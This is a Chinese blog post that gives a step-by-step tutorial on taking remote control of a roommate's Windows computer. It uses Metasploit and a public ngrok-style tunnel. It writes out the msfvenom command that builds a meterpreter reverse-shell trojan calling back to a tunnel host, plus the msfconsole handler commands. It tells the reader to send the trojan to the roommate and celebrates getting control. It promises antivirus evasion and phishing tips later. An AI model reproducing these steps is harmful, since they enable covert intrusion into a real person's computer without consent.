用metasploit映射公网远程控制舍友电脑
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
实验原理:用metasploit制作木马,发送到目标主机上,双击运行后反向连接到ngrok监听的端口,由ngrok指定的端口传输到kali监听的端口,从而控制目标主机
- 打开kali
- 下载sunny,网址www.ngrok.cc,注册后
免费购买一个tcp连接的服务器隧道,
保存好自己的隧道id,第四步会用到
查看kali处理器架构使用命令:arch
4,
切换到sunny所在的目录,输入chmod 777 ./* 对当前文件夹的文件加上权限,再输入./sunny clientid [先前保存的id],启动映射隧道
- 新建一个终端窗口,进入超级管理员权限,msfvenom -p windows/meterpreter/reverse_tcp lhost=vipgz6.91tunnel.com lport=10663 -f exe > shell.exe
- 将生成的木马传给舍友,
目前我们先不考虑对木马的伪装以及免杀
- kali打开msfconsole,输入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 6666
exploit
7.双击舍友电脑上的木马,成功上线
8.查看他的ip
- 验证一下吧
- 拿下!
免杀和木马伪装以及如何钓鱼将木马发送给舍友请关注qq群后续分享
标签:metasploit,kali,sunny,舍友,木马,公网,ngrok From: https://www.cnblogs.com/mel0n/p/16640552.html